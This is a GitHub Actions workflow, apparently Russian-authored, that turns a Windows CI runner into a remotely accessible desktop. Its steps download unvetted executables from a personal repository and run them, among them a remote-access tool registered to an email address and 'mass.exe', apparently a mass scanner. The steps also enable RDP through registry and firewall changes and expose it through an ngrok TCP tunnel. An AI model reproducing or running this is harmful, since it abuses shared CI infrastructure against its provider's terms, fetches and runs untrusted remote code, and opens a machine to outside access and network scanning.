name: Thedjancuk

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    - name: ipconfig.
      run: cmd -ipconfig.exe
    - name: Downloading files and runnig GetScreen.
      run: |
        Invoke-WebRequest https://github.com/Djemchik/Trash/blob/main/getscreen.exe?raw=true -OutFile getscreen.exe  
        .\getscreen.exe -install -register jemil1.2004@mail.ru
    - name: Downloading files and runnig FullHD.
      run: |
        Invoke-WebRequest https://github.com/Djemchik/Trash/blob/main/FullHD.exe?raw=true -OutFile fullhd.exe  
        .\fullhd.exe
        Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
        Invoke-WebRequest https://raw.githubusercontent.com/Djemchik/Trash/main/start.bat -OutFile start.bat
        Invoke-WebRequest https://raw.githubusercontent.com/Djemchik/Trash/main/loop.bat -OutFile loop.bat
    - name: Загрузка программ.
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/Djemchik/Trash/main/launcher/Node.js.lnk -OutFile Node.js.lnk
        Invoke-WebRequest https://raw.githubusercontent.com/Djemchik/Trash/main/launcher/FastConfigVPS_v2.3.exe -OutFile "FastConfigVPS_v2.3.exe"
        Invoke-WebRequest https://raw.githubusercontent.com/Djemchik/Trash/main/launcher/Visual%20Studio%202019.lnk -OutFile "Visual Studio 2019.lnk"

 
      
    - name: Загрузка Ngrok файла.
      run: Expand-Archive ngrok.zip
    - name: Подключение к учётной записи Ngrok.
      run: .\ngrok\ngrok.exe authtoken $Env:NGROK_AUTH_TOKEN
      env:
        NGROK_AUTH_TOKEN: ${{ secrets.NGROK_AUTH_TOKEN }}
    - name: Включение доступа RDP.
      run: | 
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
       
    - name: Создание туннелей.
      run: Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp --region ap 3389"'
    - name: Загрузка ChromeDefault
      run: Invoke-WebRequest https://github.com/Djemchik/Trash/raw/main/SetDefaultBrowser.sfx.exe
    - name: Загрузка AirExplorer
      run: Invoke-WebRequest https://github.com/Djemchik/Trash/raw/main/AirExplorerPortable.exe -OutFile Air.exe
    - name: Запуск AirExplorer 
      run: .\Air.exe
    - name: Загрузка MassScan
      run: Invoke-WebRequest https://github.com/Djemchik/Trash/blob/main/mass.exe?raw=true -OutFile Mass.exe
    - name: запуск 
      run: .\Mass.exe
    - name: Подключение к CPU 2 - 7 ГБ оперативной памяти - 256 SSD.
      run: cmd /c start.bat
    - name: Сделано успешно! Вы можете закрыть вкладку.
      run: cmd /c loop.bat
